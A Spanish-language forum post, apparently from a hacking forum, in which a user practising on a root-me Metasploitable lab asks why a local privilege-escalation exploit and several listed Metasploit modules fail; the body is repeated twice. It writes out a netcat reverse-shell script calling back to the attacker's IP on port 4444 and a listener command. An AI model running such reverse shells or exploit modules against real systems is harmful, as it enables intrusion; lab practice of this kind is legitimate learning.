Buenas tardes¡¡ veran he estado practicando en root-me con la maquina metasploitable y he conseguido acceder a la maquina mediante ssh y el usuario por defecto y subir varios exploits y despues ejecutarlos uno de los exploits es este
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Despues de montarlo y crear el archivo run con el comando cat y con esto en su interior
#!/bin/bash
/bin/netcat -e /bin/bash (Mi ip publica) 4444
tras tambien de darle permisos con chmod +x
y despues de poner en la maquina atacante nc-l -p 4444
ejecuto el exploit en la victima con ./(script) (numeros root obtenidos con "ps aux | grep udev")
pero me salta un error de ejecucion tras intentar varias modificaciones en el script que quitaron algunos fallos pero aun asi seguia dandome errores de ejecucion intente usar varios payloads en metasploit usando la ip publica de la victima como objetivo y tampoco dio resultado, saben que estoy haciendo mal? algun consejo? les dejo abajo los payloads que utilice
exploit/unix/irc/unreal_ircd_3281_backdoor
exploit/unix/ftp/vsftpd_234_backdoor
exploit/multi/http/php_cgi_arg_injection
exploit/linux/misc/drb_remote_codeexec
exploit/multi/samba/usermap_script
exploit/unix/misc/distcc_exec
exploit/multi/misc/java_rmi_server
Por la noche lo intentare de nuevo y hare capturas de pantalla
Un saludo¡¡¡
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Despues de montarlo y crear el archivo run con el comando cat y con esto en su interior
#!/bin/bash
/bin/netcat -e /bin/bash (Mi ip publica) 4444
tras tambien de darle permisos con chmod +x
y despues de poner en la maquina atacante nc-l -p 4444
ejecuto el exploit en la victima con ./(script) (numeros root obtenidos con "ps aux | grep udev")
pero me salta un error de ejecucion tras intentar varias modificaciones en el script que quitaron algunos fallos pero aun asi seguia dandome errores de ejecucion intente usar varios payloads en metasploit usando la ip publica de la victima como objetivo y tampoco dio resultado, saben que estoy haciendo mal? algun consejo? les dejo abajo los payloads que utilice
exploit/unix/irc/unreal_ircd_3281_backdoor
exploit/unix/ftp/vsftpd_234_backdoor
exploit/multi/http/php_cgi_arg_injection
exploit/linux/misc/drb_remote_codeexec
exploit/multi/samba/usermap_script
exploit/unix/misc/distcc_exec
exploit/multi/misc/java_rmi_server
Por la noche lo intentare de nuevo y hare capturas de pantalla
Un saludo¡¡¡